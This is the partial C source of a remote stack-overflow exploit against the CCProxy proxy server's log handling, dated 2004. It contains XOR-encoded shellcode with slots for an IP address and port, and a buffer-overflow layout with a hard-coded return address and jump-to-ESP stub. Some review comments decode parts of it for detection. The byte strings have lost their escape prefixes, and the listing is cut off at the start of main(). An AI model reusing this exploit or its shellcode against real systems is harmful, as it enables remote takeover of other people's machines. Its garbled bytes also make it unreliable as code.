1 #include <stdio.h>
2 #include <windows.h>
3 #include <winsock.h>
4
5 #pragma comment(lib, "ws2_32")
6
7
/*
 * Request trailer. Decoding the hex pairs below gives " HTTP/1.0" followed by
 * CR LF CR LF (13 bytes): the protocol version plus the blank line that ends
 * an HTTP request header. Presumably appended to the request built in main(),
 * which is not visible here -- confirm.
 * NOTE(review): the "\x" escape prefixes were lost in extraction; as printed
 * this literal is plain ASCII text, not those 13 bytes.
 */
8 unsigned char EndChar[]=
9 "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A";
10 // HTTP/1.0
11
/*
 * Payload buffer. The first two fragments (21 bytes) decode as a small
 * jmp/call/pop stub that XORs the following 0xfe (254) bytes in place with
 * the single-byte key 0xee, which matches the author's note below. The
 * remaining fragments (15 x 16 + 14 = 254 bytes) are the encoded body, so
 * they carry no readable strings or addresses until the stub has run.
 * Per the author's note, offsets 92 and 99 hold an IP address and a port
 * (the base of those offsets is not stated); presumably main() fills them in
 * before sending -- not visible here, confirm.
 * For detection: the stub bytes and the XOR key are fixed in this listing;
 * presumably only the IP/port fields differ between uses.
 * NOTE(review): the "\x" escape prefixes were lost in extraction; as printed
 * these literals are plain ASCII text, not byte values.
 */
12 unsigned char shellcode[] =
13 "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05"
14
15 "xe8xedxffxffxff"
16
17 /* 254 bytes shellcode, xor with 0xee */
18 /* offset 92=IP offset 99=PORT*/
19 "x07x36xeexeexeexb1x8ax4fxdexeexeexeex65xaexe2x65"
20
21 "x9exf2x43x65x86xe6x65x19x84xeaxb7x06x96xeexeexee"
22
23 "x0cx17x86xddxdcxeexeex86x99x9dxdcxb1xbax11xf8x7b"
24
25 "x84xedxb7x06x8exeexeexeex0cx17xbfxbfxbfxbfx84xef"
26
27 "x84xecx11xb8xfex7dx86x91xeexeexefx86xecxeexeexdb"
28
29 "x65x02x84xfexbbxbdx11xb8xfax6bx2ex9bxd6x65x12x84"
30
31 "xfcxb7x45x0cx13x88x29xaaxcaxd2xefxefx7dx45x45x45"
32
33 "x65x12x86x8dx83x8axeex65x02xbex63xa9xfexb9xbexbf"
34
35 "xbfxbfx84xefxbfxbfxbbxbfx11xb8xeax84x11x11xd9x11"
36
37 "xb8xe2x11xb8xf6x11xb8xe6xbfxb8x65x9bxd2x65x9axc0"
38
39 "x96xedx1bxb8x65x98xcexedx1bxddx27xa7xafx43xedx2b"
40
41 "xddx35xe1x50xfexd4x38x9axe6x2fx25xe3xedx34xaex05"
42
43 "x1fxd5xf1x9bx09xb0x65xb0xcaxedx33x88x65xe2xa5x65"
44
45 "xb0xf2xedx33x65xeax65xedx2bx45xb0xb7x2dx06xcdx11"
46
47 "x11x11x60xa0xe0x02x9cx10x5dxf8x01x20x0ex8ex43x37"
48
49 "xebx20x37xe7x1bx43x02x17x44x8ex09x97x28x97";
50
51 /*
52
CCProxy Log Remote Stack Overflow Exploit
Ruder
11/09/2004
53 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
54 | |inc edx...inc edx|shellcode|0x7ffa54cd| | |
55 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
56 +0x42 +shellcode +IPLen( IP )=4065
57
58 :
59 mov ecx,0x12811111
60 shr ecx,0x14
61 sub esp,ecx
62 jmp esp
63
64
65 1.
66 2. ecx inc edx
67 */
68
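/*
 * Print the program banner: title, author, credit for the bug report and the
 * author's contact details. Writes to stdout only; takes no input and returns
 * nothing.
 */
void start(void)
{
    /*
     * puts() appends the newline itself and takes no format string. The
     * listing as printed had lost the "\n" escapes (a literal 'n' ended each
     * line), carried a stray ';' inside one call, and used a non-ASCII minus
     * sign in "E-mail".
     */
    puts("CCProxy Log Stack Overflow Exploit!");
    puts("written by Ruder 11/2004");
    puts("Bug found by Isno,See xfocus.com");
    puts("Homepage:http://ruder.cdut.net");
    puts("E-mail:cocoruder@163.com");
}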
77
78 int main(int